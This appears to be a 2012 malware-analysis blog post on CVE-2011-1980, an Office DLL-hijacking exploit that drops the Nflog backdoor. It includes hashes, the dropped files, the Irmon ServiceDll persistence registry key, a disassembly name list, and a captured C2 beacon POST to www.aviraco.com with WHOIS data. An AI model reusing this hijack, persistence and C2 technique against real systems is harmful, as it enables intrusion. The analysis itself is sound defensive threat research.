Feb 9 CVE-2011-1980 MSOffice DLL Loading vulnerability + Trojan Nflog

fputlsat.dll

On February 9, 2012 Symantec disclosed that the previously patched MS Office insecure library loading vulnerability was exploited in the wild. DLL loading vulnerabilities were used in targeted attacks at least with two other exploits in 2011 and they did not reach epidemic proportions like it happend with CVE-2010-3333 RTF or some of the Adobe PDF exploits. I refer to
Contagio: Sept. 23 CVE-2011-1991 type (1) deskpan.dll Windows components DLL loading vulnerability
and
Contagio: Apr 13 CVE-2011-2100 PDF - Adobe DLL Loading Vulnerability - Agenda.7z

DLL search order hijacking exploits had and will have many new reincarnations because of the DLL loading preference order - Current Working Directory is preferred for most DLL files. You can read more about the root of these problems (not necessarily related to MS Office but in general) in M-unition: DLL Search Order Hijacking Revisited by Nick Harbour

As described in the Symantec article, fputlsat.dll must be present in the same directory as the Word document in order to be activated by the ActiveX control embedded in the Word document. The payload of this sample is a backdoor trojan Nflog. 

Common Vulnerabilities and Exposures (CVE)number

CVE-2011-1980 Untrusted search path vulnerability in Microsoft Office 2003 SP3 and 2007 SP2 allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a .doc, .ppt, or .xls file, aka "Office Component Insecure Library Loading Vulnerability."

• Microsoft Security Bulletin MS11-073 - Important Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (2587634)

• Symantec: New Targeted Attack Using Office Exploit Found In The Wild by Joji Hamada

 

  General File Information

File: 275c5ac2067d17187a71b94ccfdc4608.doc
Size: 22016
MD5:  275C5AC2067D17187A71B94CCFDC4608

File: fputlsat.dll
Size: 126976
MD5:  60068812B59E58D6338AAEBD649F9020   

 

Download

Download as a password protected archive (email me if you need the password)

File Desription

File: 275c5ac2067d17187a71b94ccfdc4608.doc
Size: 22016
MD5:  275C5AC2067D17187A71B94CCFDC4608

Before the document is open -
DLL file is present is the same directory

The Word document has embedded macro - ActiveX List View Form Control, a very common ActiveX control, which calls fputlsat.dll  "Microsoft Office FrontPage Client Utility Library".  There is nothing unusual about this behavior,  you can read more about this particular control here "Using the ListView ActiveX Control"  and it is normal for it to call Frontpage libraries.


The vulnerability presents itself in the in the fact that a DLL located in

After the document is open.
DLL file is renamed to Thumbs.db

 the same folder as the Word document  will be used before the legitimate  DLL in  C:\Program Files\Microsoft Office\Office\.. or other directories.

Activity after the exploit launch

Examination of the ActiveX component shows the original path of the macro/control as it existed on the author's computer  C:\Documents and Settings\Bandit\Local Settings\Temp\Word8.0\FPDTC.DLL (nice user name)
Office 8.0 is office 97 (yes, eons ago) and FPDTC.DLL is a Front Page Design Time Control that was used around 2000-2001. Considering this, I wonder if this vulnerability not only existed but also was used with minor tweaks through all versions of MS Office - starting with Office 97 and ending with Office 2010 we finally found it out. Perhaps, Microsoft Office/VB gurus will be able to answer and / or correct me.

List view control

Upon launch, the user is presented with a choice to Run or not to run ActiveX controls. By that time the exploit already worked and the files were dropped/renamed. Anwering Yes will allow the dropped payload iede32.ocx to run.

ActiveX prompt.

The picture below shows locations of the dropped file and the registry changes.

SVCHOST.EXE process injection

File: fputlsat.dll
Size: 126976
MD5:  60068812B59E58D6338AAEBD649F9020  

fputlsat.dll (thumbs.db) strings

Unicode Strings:
---------------------------------------------------------------------------

Adobe Photoshop   ---- ???
Adobe Photoshop 6.0  ----- ? Unknown if these artifacts mean anything. Photoshop is just as old. May be same DLL code was used for other products.

 
VS_VERSION_INFO
StringFileInfo
040404b0
Comments
CompanyName
Microsoft Corporation
FileDescription
Microsoft Office FrontPage Client Utility Library
FileVersion
11.0.5510.0
InternalName
FP40CUTL
LegalCopyright
Copyright(C) Microsoft Corporation 2003.  All rights reserved.
LegalTrademarks
OriginalFilename
FP40CUTL
PrivateBuild
ProductName
FP40CUTL.DLL  -- Frontpage 2000 file. Wonder if Word 2000 was affected too.
ProductVersion
11, 0, 0, 0
SpecialBuild
VarFileInfo
Translation

Created Files

File: iede32.ocx
Size: 13824
MD5:  D4859FC951652B3C9657F8621D4DB625

Virustotal

 The trojan starts its activity POST /NfLog/Nfile.asp, this trojan is not new, for example there were Zero day CVE-2011-2462 files carrying the same trojan. The service modified is irmon (frequently abused by these types of attacks - here is a ThreatExpert report of a very common APT backdoor using the same service

List of strings
// Created : 14.02.2012 08:00 // Type : Name List 10001000: SUB_L10001000 10001010: CASE_10001064_PROC0001 10001021: CASE_10001064_PROC0002 10001033: CASE_10001064_PROC0000 1000105A: L1000105A 10001064: CASE_PROCTABLE_10001064 10001080: ServiceMain 1000113A: L1000113A 1000113F: L1000113F 10001152: L10001152 1000115F: L1000115F 10001170: SUB_L10001170 100011C0: L100011C0 100011D1: CASE_10001248_PROC0000 100011E7: CASE_10001248_PROC0004 100011F5: L100011F5 100011F8: CASE_10001248_PROC0001 10001214: CASE_10001248_PROC0002 10001230: CASE_10001248_PROC0003 10001248: CASE_PROCTABLE_10001248 10001260: InstallService 100012A6: L100012A6 100012D8: L100012D8 1000132D: L1000132D 10001339: L10001339 1000135A: L1000135A 1000135F: L1000135F 10001374: L10001374 1000139A: L1000139A 100013DC: L100013DC 10001465: L10001465 1000149F: L1000149F 100014D1: L100014D1 1000151C: L1000151C 10001531: L10001531 10001537: L10001537 1000153A: L1000153A 10001560: RundllInstallA 10001570: UninstallService 100015CD: L100015CD 100015E6: L100015E6 10001614: L10001614 10001628: L10001628 1000162E: L1000162E 1000163E: L1000163E 1000164A: L1000164A 10001660: RundllUninstallA 10001670: SUB_L10001670 100016D9: L100016D9 100016E0: L100016E0 10001726: L10001726 10001764: L10001764 10001789: L10001789 1000178B: L1000178B 100017A5: L100017A5 100017E0: SUB_L100017E0 100017FF: L100017FF 10001901: L10001901 100019CC: L100019CC 10001A8E: L10001A8E 10001A93: L10001A93 10001AA0: SUB_L10001AA0 10001AC5: L10001AC5 10001B03: L10001B03 10001B3B: L10001B3B 10001BF0: SUB_L10001BF0 10001C12: L10001C12 10001C2E: L10001C2E 10001C38: L10001C38 10001C40: SUB_L10001C40 10001C77: L10001C77 10001C80: SUB_L10001C80 10001C9D: L10001C9D 10001CB3: L10001CB3 10001CC9: L10001CC9 10001CD0: SUB_L10001CD0 10001E84: L10001E84 10001E90: SUB_L10001E90 10001EF0: SUB_L10001EF0 10001F57: L10001F57 10001F5D: L10001F5D 10001F71: L10001F71 10001FA7: L10001FA7 10001FCB: L10001FCB 1000200A: L1000200A 1000204B: L1000204B 1000208E: L1000208E 100020C0: SUB_L100020C0 1000212B: L1000212B 1000214F: L1000214F 1000215D: L1000215D 10002170: SUB_L10002170 10002180: L10002180 10002198: L10002198 100021A0: SUB_L100021A0 100021B0: SUB_L100021B0 10002238: L10002238 10002278: L10002278 10002288: L10002288 10002292: L10002292 100022EC: L100022EC 10002300: SUB_L10002300 1000239D: L1000239D 1000239F: L1000239F 100023E9: L100023E9 1000241D: L1000241D 10002446: L10002446 1000247D: L1000247D 100024B3: L100024B3 10002500: SUB_L10002500 10002520: SUB_L10002520 1000255B: L1000255B 100025B8: L100025B8 10002605: L10002605 1000260D: L1000260D 10002613: L10002613 10002630: SUB_L10002630 100026E5: L100026E5 100026FF: L100026FF 10002705: L10002705 10002708: L10002708 10002730: SUB_L10002730 100027D4: L100027D4 100027DA: L100027DA 100027E4: L100027E4 10002800: SUB_L10002800 1000288C: L1000288C 100028EC: L100028EC 100028F2: L100028F2 100028F5: L100028F5 10002920: L10002920 10002936: L10002936 1000293C: jmp_MSVCRT.dll!__CxxFrameHandler 10002950: jmp_MSVCRT.dll!_CxxThrowException 10002956: jmp_MSVCRT.dll!_except_handler3 1000295C: jmp_MSVCRT.dll!??3@YAXPAX@Z 10002962: jmp_MSVCRT.dll!??2@YAPAXI@Z 10002970: SUB_L10002970 1000297C: L1000297C 10002990: L10002990 1000299F: SUB_L1000299F 100029B5: L100029B5 100029DD: L100029DD 100029E1: L100029E1 10002A07: L10002A07 10002A1E: L10002A1E 10002A2F: L10002A2F 10002A34: L10002A34 10002A44: L10002A44 10002A47: L10002A47 10002A4A: EntryPoint 10002A66: L10002A66 10002A70: L10002A70 10002A82: L10002A82 10002A8C: L10002A8C 10002A8E: L10002A8E 10002A92: L10002A92 10002AAE: L10002AAE 10002AB7: L10002AB7 10002AC6: L10002AC6 10002ADD: L10002ADD 10002AE0: L10002AE0 10002AE8: jmp_MSVCRT.dll!??1type_info@@UAE@XZ 10002AEE: jmp_MSVCRT.dll!_initterm 10002B00: L10002B00 10002B10: L10002B10 10002B1B: L10002B1B 10002B30: L10002B30 10003000: ADVAPI32.dll!RegSetValueExA 10003004: ADVAPI32.dll!OpenServiceA 10003008: ADVAPI32.dll!DeleteService 1000300C: ADVAPI32.dll!RegOpenKeyExA 10003010: ADVAPI32.dll!RegQueryValueExA 10003014: ADVAPI32.dll!RegCloseKey 10003018: ADVAPI32.dll!OpenSCManagerA 1000301C: ADVAPI32.dll!CreateServiceA 10003020: ADVAPI32.dll!ChangeServiceConfig2A 10003024: ADVAPI32.dll!CloseServiceHandle 10003028: ADVAPI32.dll!RegisterServiceCtrlHandlerA 1000302C: ADVAPI32.dll!SetServiceStatus 10003030: ADVAPI32.dll!RegCreateKeyA 10003038: KERNEL32.dll!LoadLibraryA 1000303C: KERNEL32.dll!CloseHandle 10003040: KERNEL32.dll!SetFileTime 10003044: KERNEL32.dll!SystemTimeToFileTime 10003048: KERNEL32.dll!CreateFileA 1000304C: KERNEL32.dll!SetEvent 10003050: KERNEL32.dll!OpenEventA 10003054: KERNEL32.dll!GetLastError 10003058: KERNEL32.dll!Sleep 1000305C: KERNEL32.dll!GetModuleFileNameA 10003060: KERNEL32.dll!SetLastError 10003064: KERNEL32.dll!CreateEventA 10003068: KERNEL32.dll!WaitForSingleObject 1000306C: KERNEL32.dll!GetProcAddress 10003070: KERNEL32.dll!FreeConsole 10003074: KERNEL32.dll!GetSystemDirectoryA 10003078: KERNEL32.dll!FreeLibrary 10003080: MSVCRT.dll!??3@YAXPAX@Z 10003084: MSVCRT.dll!??2@YAPAXI@Z 10003088: MSVCRT.dll!atoi 1000308C: MSVCRT.dll!fwrite 10003090: MSVCRT.dll!fclose 10003094: MSVCRT.dll!fopen 10003098: MSVCRT.dll!strstr 1000309C: MSVCRT.dll!sprintf 100030A0: MSVCRT.dll!_snprintf 100030A4: MSVCRT.dll!_strupr 100030A8: MSVCRT.dll!??1type_info@@UAE@XZ 100030AC: MSVCRT.dll!free 100030B0: MSVCRT.dll!_initterm 100030B4: MSVCRT.dll!malloc 100030B8: MSVCRT.dll!_adjust_fdiv 100030BC: MSVCRT.dll!_beginthreadex 100030C0: MSVCRT.dll!_except_handler3 100030C4: MSVCRT.dll!__CxxFrameHandler 100030C8: MSVCRT.dll!strchr 100030CC: MSVCRT.dll!strncat 100030D0: MSVCRT.dll!strncpy 100030D4: MSVCRT.dll!wcstombs 100030D8: MSVCRT.dll!_stricmp 100030DC: MSVCRT.dll!_CxxThrowException 100030E4: WININET.dll!HttpEndRequestA 100030E8: WININET.dll!HttpSendRequestA 100030EC: WININET.dll!HttpAddRequestHeadersA 100030F0: WININET.dll!HttpOpenRequestA 100030F4: WININET.dll!InternetConnectA 100030F8: WININET.dll!InternetSetOptionA 100030FC: WININET.dll!InternetReadFile 10003100: WININET.dll!InternetCloseHandle 10003104: WININET.dll!HttpQueryInfoA 1000310C: WS2_32.dll!WS2_32.9 10003110: WS2_32.dll!WS2_32.52 10003114: WS2_32.dll!WSAIoctl 10003118: WS2_32.dll!WS2_32.116 1000311C: WS2_32.dll!WS2_32.3 10003120: WS2_32.dll!WS2_32.57 10003124: WS2_32.dll!WSASocketA 10003128: WS2_32.dll!WS2_32.115 1000312C: WS2_32.dll!WS2_32.16 10003130: WS2_32.dll!WS2_32.15 10003134: WS2_32.dll!WS2_32.2 10003138: WS2_32.dll!WS2_32.12 10003140: L10003140 1000314C: L1000314C 10003150: L10003150 10003160: L10003160 10003170: L10003170 10003180: L10003180 10003190: L10003190 10003198: L10003198 100031B0: L100031B0 100031B8: L100031B8 100031C8: L100031C8 100031E0: L100031E0 10003200: L10003200 10003220: L10003220 10003230: L10003230 10003240: L10003240 10003260: L10003260 10003270: L10003270 10003288: L10003288 10003298: L10003298 100032B8: L100032B8 100032C0: L100032C0 100032E0: L100032E0 100032F0: L100032F0 10003308: L10003308 10004000: L10004000 10004004: L10004004 10004020: SSZ10004020_www_aviraco_com 10004084: SSZ10004084__IElog 100040E8: L100040E8 100040F0: SSZ100040F0_Network_address_translation_for_ 100041F4: L100041F4 100041F8: SSZ100041F8_SvcHostDLL_exe 10004208: L10004208 10004218: L10004218 10004228: SSZ10004228_RegSetValueEx_ServiceDll_ 10004244: SSZ10004244_ServiceDll 10004250: SSZ10004250_GetModuleFileName___get_dll_path 10004274: SSZ10004274_RegCreateKey_Parameters_ 10004290: SSZ10004290_Parameters 1000429C: SSZ1000429C_SYSTEM_CurrentControlSet_Service 100042C0: SSZ100042C0_IPv6_Stack_Local_Support 100042DC: SSZ100042DC__SystemRoot__System32_svchost_ex 1000430C: SSZ1000430C_RegQueryValueEx_Svchost_netsvcs_ 10004330: SSZ10004330_netsvcs 10004338: SSZ10004338_SOFTWARE_Microsoft_Windows_NT_Cu 10004370: SSZ10004370_Irmon 10004378: SSZ10004378_IEcoreOk 10004384: SSZ10004384_ProcGo 1000438C: SSZ1000438C_GetFile 10004394: SSZ10004394__Nfile_asp 100043A0: L100043A0 100043A4: SSZ100043A4_POST 100043AC: SSZ100043AC_HTTP_1_1 100043B8: SSZ100043B8_Mozilla_4_0__compatible__MSIE_6_ 100043F0: SSZ100043F0_InternetOpenA 10004400: SSZ10004400_wininet_dll 1000440C: L1000440C 10004410: SSZ10004410_InternetSetOptionA 10004424: SSZ10004424_InternetReadFile 10004438: SSZ10004438_InternetConnectA 1000444C: SSZ1000444C_InternetCloseHandle 10004460: SSZ10004460_HttpSendRequestA 10004474: SSZ10004474_HttpQueryInfoA 10004484: SSZ10004484_HttpOpenRequestA 10004498: SSZ10004498_HttpEndRequestA 100044A8: SSZ100044A8__wininet_dll 100044B8: SSZ100044B8_ideo_dll 100044C4: SSZ100044C4_HTTP_1_0 100044D0: L100044D0 100044D4: L100044D4 100044D8: SSZ100044D8_1234567890 100044E4: SSZ100044E4__TestURL_asp 100044F4: L100044F4 100044F8: L100044F8 100044FC: L100044FC 10004500: SSZ10004500_www_microsoft_com 10004514: SSZ10004514_Mozilla_5_0__compatible__MSIE_7_ 10004548: SSZ10004548__s__d 10004550: L10004550 10004554: L10004554 10004558: SSZ10004558_Proxy_Authorization__Basic_ 10004574: SSZ10004574_HEAD 10004580: L10004580 100045A0: L100045A0 100045A4: L100045A4 100045A8: L100045A8 100045AC: L100045AC 100045B0: L100045B0 1000463D: L1000463D 1000483D: L1000483D 1000485D: L1000485D 10004A5D: L10004A5D 10004AE0: L10004AE0 10004AE4: L10004AE4 10004AE8: L10004AE8 10004AEC: L10004AEC 10004AF0: L10004AF0 10004AF4: L10004AF4 10004AF8: L10004AF8 10004AFC: L10004AFC 10004B00: L10004B00 10004B04: L10004B04 10004B08: L10004B08 10004B0C: L10004B0C 10004B10: L10004B10 10004B14: L10004B14 10004F18: L10004F18 10005F1C: L10005F1C 10005F2C: L10005F2C 10005F3C: L10005F3C 10005F40: L10005F40 10006144: L10006144 10006244: L10006244 10006248: L10006248 1000624C: L1000624C 10006250: L10006250 10006254: L10006254

Key Name:          HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Irmon\Parameters
Class Name:        <NO CLASS>
Last Write Time:   2/14/2012 - 1:40 AM
Value 0
  Name:            ServiceDll
  Type:            REG_EXPAND_SZ
  Data:            C:\WINDOWS\system32\iede32.ocx

Traffic

In my case, CC was not active or at least I didn't receive any traffic but you can see the initial POST and the domain name.

POST /IElog/TestURL.asp HTTP/1.0
User-Agent: www
Host: www.aviraco.com
Content-Length: 10
Pragma: no-cache

1234567890HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Tue, 14 Feb 2012 05:39:57 GMT
Connection: close
Content-Length: 39
<h1>Bad Request (Invalid Hostname)</h1>

  

Domain Name      : aviraco.com
PunnyCode        : aviraco.com
Creation Date    : 2011-03-30 10:31:10
Updated Date     : 2011-03-30 10:31:10
Expiration Date  : 2012-03-30 10:31:10

Registrant:
  Organization   : zhipengwang
  Name           : zhipengwang
  Address        : Zhongguancun Hailong Building, Room 1005
  City           : haidianqu
  Province/State : beijingshi
  Country        : china
  Postal Code    : 100083

216.83.63.147
Host reachable, 408 ms. average
216.83.32.0 - 216.83.63.255
Ethr.Net LLC
7960B Soquel Dr. #417
Aptos
CA
95003
United States

IP Address History Event Date     Action     Pre-Action IP     Post-Action IP 2009-12-28     New     -none-     174.37.172.68 2010-09-13     Change     174.37.172.68     67.228.81.181 2010-09-24     Change     67.228.81.181     174.37.172.68 2011-02-02     Change     174.37.172.68     67.228.81.180 2011-02-13     Not Resolvable     67.228.81.180     -none- 2011-10-14     New     -none-     98.126.113.28 2011-10-25     Change     98.126.113.28     216.83.63.14 Registrar History Date     Registrar 2009-12-26     Name.com aka DomainSite 2011-03-29     Xin Net Name Server History Event Date     Action     Pre-Action Server     Post-Action Server 2009-12-28     New     -none-     Name.com 2011-02-08     Delete     Name.com     -none- 2011-03-31     New     Xinnet.cn     Xinnetdns.com 2011-12-13     Transfer     Xinnetdns.com     Xincache.com RR www.comedns.com.    A    216.83.63.147 www.creamofa.com.    A    216.83.63.147

Automated Scans

Virustotal
SHA256:     429f206f2c68014c75f8a6ae09e68dd672401e461dd2fa72b9087bb5ee530d1e
SHA1:     7dbf130964cdc0110fd517a5d98188df3d56e850
MD5:     275c5ac2067d17187a71b94ccfdc4608
File size:     21.5 KB ( 22016 bytes )
File name:     report.doc
File type:     MS Word Document
Detection ratio:     17 / 43
Analysis date:     2012-02-15 04:10:05 UTC ( 46 minutes ago )
Antivirus     Result     Update
AhnLab-V3     Dropper/Ms11-073     20120213
AVG     Exploit_c.UDK     20120213
ClamAV     Exploit.Doc-2     20120214
Emsisoft     Exploit.MSWord.CVE-2011!IK     20120214
eSafe     -     20120213
eTrust-Vet     -     20120213
Fortinet     W97M/CVE_2011_1980.A!exploit     20120214
Ikarus     Exploit.MSWord.CVE-2011     20120214
Kaspersky     Exploit.MSWord.CVE-2011-1980.a     20120214
McAfee     Exploit-CVE2011-1980     20120214
McAfee-GW-Edition     -     20120213
Microsoft     Exploit:Win32/Actjack.A     20120213
NOD32     W97M/Exploit.CVE-2011-1980.A     20120214
nProtect     Trojan-Exploit/W32.Agent.22016     20120213
PCTools     Trojan.Generic     20120207
Sophos     Troj/Hijack-H     20120214
SUPERAntiSpyware     -     20120206
Symantec     Trojan.Activehijack     20120214
TrendMicro     TROJ_ACTIVEHIJ.A     20120213
TrendMicro-HouseCall     TROJ_ACTIVEHIJ.A     20120214
ViRobot     Doc.S.MS11-073.22016     20120213




Virustotal
SHA256:     48bc6c0df3302f7eaa6061c4f3b0357b4c512d5bd6f6088abc6fc274f2efc5aa
SHA1:     8f86b7fcaf0c1ee9b795fa8e559def47ef468128
MD5:     60068812b59e58d6338aaebd649f9020
File size:     124.0 KB ( 126976 bytes )
File name:     fputlsat.dll
File type:     Win32 DLL
Detection ratio:     28 / 43
Analysis date:     2012-02-15 04:10:02 UTC ( 23 minutes ago )
AhnLab-V3     Win-Trojan/Activehijack.126976     20120213
AntiVir     TR/Drop.Kaliox.A     20120213
Avast     Win32:Malware-gen     20120214
BitDefender     Trojan.Generic.KD.529689     20120214
DrWeb     Trojan.MulDrop3.34467     20120214
Emsisoft     Trojan-Dropper.Win32.Agent!IK     20120214
F-Secure     Trojan.Generic.KD.529689     20120214
Fortinet     W32/Agent.PRG!tr     20120214
GData     Trojan.Generic.KD.529689     20120214
Ikarus     Trojan-Dropper.Win32.Agent     20120214
K7AntiVirus     Riskware     20120213
Kaspersky     Trojan-Dropper.Win32.Agent.gjnt     20120214
McAfee     Generic Dropper.p     20120214
McAfee-GW-Edition     Artemis!60068812B59E     20120213
Microsoft     TrojanDropper:Win32/Kaliox.A     20120213
NOD32     Win32/TrojanDropper.Agent.PRG     20120214
Norman     W32/Agent.XGSO     20120213
nProtect     Trojan-Dropper/W32.Agent.126976.CS     20120213
PCTools     Trojan.Dropper     20120207
Symantec     Trojan.Dropper     20120214
TrendMicro     TROJ_MULDROP.IC     20120213
TrendMicro-HouseCall     TROJ_MULDROP.IC     20120214
VIPRE     Trojan.Win32.Generic!BT     20120214
ViRobot     Trojan.Win32.Activehijack.126976     20120213
VirusBuster     Trojan.DR.Agent!ly6ZRARwo6A


Virustotal
 SHA256:     27c87e7993c5661dd3b65e51df5884519fc0234bf36de72082644fa909ccb793
SHA1:     d0c3e34bd97c4aa56fe9f176954d274595926a32
MD5:     d4859fc951652b3c9657f8621d4db625
File size:     13.5 KB ( 13824 bytes )
File name:     iede32.ocx
File type:     Win32 DLL
Detection ratio:     28 / 42
Analysis date:     2012-02-14 04:13:46 UTC ( 1 day, 2 hours ago )
0
AhnLab-V3     Win-Trojan/Activehijack.13824     20120213
AntiVir     TR/Spy.13824.71     20120214
Antiy-AVL     Trojan/Win32.Genome.gen     20120213
BitDefender     Gen:Trojan.Heur.LP.aq4@aqXBVhe     20120214
Comodo     TrojWare.Win32.GameThief.Nilage.~CRSH     20120214
DrWeb     Trojan.Click2.13847     20120214
Emsisoft     Trojan.Win32.Spy!IK     20120214
eSafe     Win32.GenHeur.LP.Aq@     20120213
F-Secure     Gen:Trojan.Heur.LP.aq4@aqXBVhe     20120214
Fortinet     W32/Agent.OLJ     20120214
GData     Gen:Trojan.Heur.LP.aq4@aqXBVhe     20120214
Ikarus     Trojan.Win32.Spy     20120214
K7AntiVirus     Riskware     20120213
Kaspersky     Trojan.Win32.Genome.aehtz     20120214
McAfee     Generic Dropper.p     20120214
McAfee-GW-Edition     Artemis!D4859FC95165     20120213
Microsoft     TrojanDownloader:Win32/Kaliox.A     20120213
NOD32     Win32/Agent.OLJ     20120214
Norman     W32/Troj_Generic.KIKX     20120213
nProtect     Trojan/W32.Genome.13824.J     20120213
Sophos     Troj/Spy-YL     20120214
Symantec     Trojan.Gen.2     20120214
TheHacker     Trojan/Agent.olj     20120213
TrendMicro     BKDR_CONIP.A     20120214
TrendMicro-HouseCall     BKDR_CONIP.A     20120214
ViRobot     Trojan.Win32.Activehijack.13824     20120214
VirusBuster     Trojan.Agent!KGIS/NcFcUc     20120213